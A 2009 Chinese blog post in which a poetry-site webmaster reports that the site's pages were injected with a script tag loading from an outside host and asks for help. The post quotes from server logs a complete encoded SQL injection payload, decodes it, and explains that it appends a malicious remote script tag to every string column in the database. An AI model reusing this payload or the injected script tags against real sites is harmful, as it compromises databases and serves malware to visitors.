adandelion

诗词在线 http:/www.chinapoesy.com


诗词在线 |唐诗|宋词|元曲|诗经|离骚|乐府|现代诗歌
博客园 首页 联系 订阅 管理
2009年新年第一天网站被挂马了 崩溃啊 http://%68%68%6A%32%2E%63%6E

2009年新年第一天网站被挂马了

页面后面追加了木马:

<script src=http://%68%68%6A%32%2E%63%6E></script>

 

真让人崩溃啊。

则么办啊。除非把文件设置成只读,否则都会被篡改的。。。

目录权限user没有修改权限啊。。。

 

有人了解吗?谢谢啊。

 

LOG 记录,有人尝试sql注入:下面的不是encode的字符串,那是什么呢?

 

'%3B%44%65%43%4C%61%52%45%20%40%53%20%4E%76%41%72%43%48%61%52%28%34%30%30%30%29%3B%53%65%54%20%40%53%3D%43%61%53%74%28%30%78%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%30%30%30%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%46%30%30%37%32%30%30%32%30%30%30%35%33%30%30%36%35%30%30%36%43%30%30%36%35%30%30%36%33%30%30%37%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%43%30%30%34%32%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%46%30%30%36%32%30%30%36%41%30%30%36%35%30%30%36%33%30%30%37%34%30%30%37%33%30%30%32%30%30%30%34%31%30%30%32%43%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%33%30%30%36%46%30%30%36%43%30%30%37%35%30%30%36%44%30%30%36%45%30%30%37%33%30%30%32%30%30%30%34%32%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%35%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%39%30%30%36%34%30%30%33%44%30%30%34%32%30%30%32%45%30%30%34%39%30%30%36%34%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%32%37%30%30%37%35%30%30%32%37%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%32%38%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%39%30%30%33%39%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%33%30%30%33%35%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%32%30%30%33%33%30%30%33%31%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%31%30%30%33%36%30%30%33%37%30%30%32%39%30%30%32%30%30%30%34%46%30%30%37%30%30%30%36%35%30%30%36%45%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%32%30%30%30%34%45%30%30%36%35%30%30%37%38%30%30%37%34%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%39%30%30%36%45%30%30%37%34%30%30%36%46%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%39%30%30%36%43%30%30%36%35%30%30%32%38%30%30%34%30%30%30%34%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%35%46%30%30%35%33%30%30%37%34%30%30%36%31%30%30%37%34%30%30%37%35%30%30%37%33%30%30%33%44%30%30%33%30%30%30%32%39%30%30%32%30%30%30%34%32%30%30%36%35%30%30%36%37%30%30%36%39%30%30%36%45%30%30%32%30%30%30%34%35%30%30%37%38%30%30%36%35%30%30%36%33%30%30%32%38%30%30%32%37%30%30%37%35%30%30%37%30%30%30%36%34%30%30%36%31%30%30%37%34%30%30%36%35%30%30%32%30%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%35%34%30%30%32%42%30%30%32%37%30%30%35%44%30%30%32%30%30%30%35%33%30%30%36%35%30%30%37%34%30%30%32%30%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%34%33%30%30%32%42%30%30%32%37%30%30%35%44%30%30%33%44%30%30%35%32%30%30%37%34%30%30%37%32%30%30%36%39%30%30%36%44%30%30%32%38%30%30%34%33%30%30%36%46%30%30%36%45%30%30%37%36%30%30%36%35%30%30%37%32%30%30%37%34%30%30%32%38%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%38%30%30%33%30%30%30%33%30%30%30%33%30%30%30%32%39%30%30%32%43%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%34%33%30%30%32%42%30%30%32%37%30%30%35%44%30%30%32%39%30%30%32%39%30%30%32%42%30%30%32%37%30%30%32%37%30%30%33%43%30%30%35%33%30%30%36%33%30%30%37%32%30%30%36%39%30%30%37%30%30%30%37%34%30%30%32%30%30%30%35%33%30%30%37%32%30%30%36%33%30%30%33%44%30%30%36%38%30%30%37%34%30%30%37%34%30%30%37%30%30%30%33%41%30%30%32%46%30%30%32%46%30%30%36%33%30%30%32%45%30%30%36%45%30%30%37%35%30%30%36%33%30%30%32%35%30%30%33%36%30%30%34%33%30%30%36%35%30%30%36%31%30%30%37%32%30%30%33%33%30%30%32%45%30%30%36%33%30%30%36%46%30%30%36%44%30%30%32%46%30%30%36%33%30%30%37%33%30%30%37%33%30%30%32%46%30%30%36%33%30%30%32%45%30%30%36%41%30%30%37%33%30%30%33%45%30%30%33%43%30%30%32%46%30%30%35%33%30%30%36%33%30%30%37%32%30%30%36%39%30%30%37%30%30%30%37%34%30%30%33%45%30%30%32%37%30%30%32%37%30%30%32%37%30%30%32%39%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%32%30%30%30%34%45%30%30%36%35%30%30%37%38%30%30%37%34%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%39%30%30%36%45%30%30%37%34%30%30%36%46%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%34%35%30%30%36%45%30%30%36%34%30%30%32%30%30%30%34%33%30%30%36%43%30%30%36%46%30%30%37%33%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%34%30%30%36%35%30%30%36%31%30%30%36%43%30%30%36%43%30%30%36%46%30%30%36%33%30%30%36%31%30%30%37%34%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%20%61%53%20%4E%76%41%72%43%68%41%52%28%34%30%30%30%29%29%3B%45%78%45%63%28%40%53%29%3B%2D%2D

 

 

反解后:

 

';DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A006500630074007300200041002C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E00580074007900700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E007600650072007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0053006300720069007000740020005300720063003D0068007400740070003A002F002F0063002E006E007500630025003600430065006100720033002E0063006F006D002F006300730073002F0063002E006A0073003E003C002F005300630072006900700074003E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--

 

最终:

Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<Script Src=http://c.nuc%6Cear3.com/css/c.js></Script>''')Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor

 

 

目的:

他要把当前数据库里的所有 字符串类型的字段 都加上一段 代码。

 

 

好在没成功。否则惨了。

这个没成功,不过另外一个确成功了。

 

 

 

posted on 2009-01-01 10:17  猪头  阅读(1705)  评论(7编辑  收藏  举报

欢迎访问诗词在线http://www.chinapoesy.com   诗词在线 |唐诗|宋词|元曲|诗经|离骚|乐府|古典诗歌|现代诗歌|古典诗词|现代诗词|诗歌可以陶冶你的情操、丰富你的生活,让你更具内涵。诗词在线打造中国最好的诗词社区!

诗词在线社区

126在线阅读网 历史书籍、文学书籍、小说。。。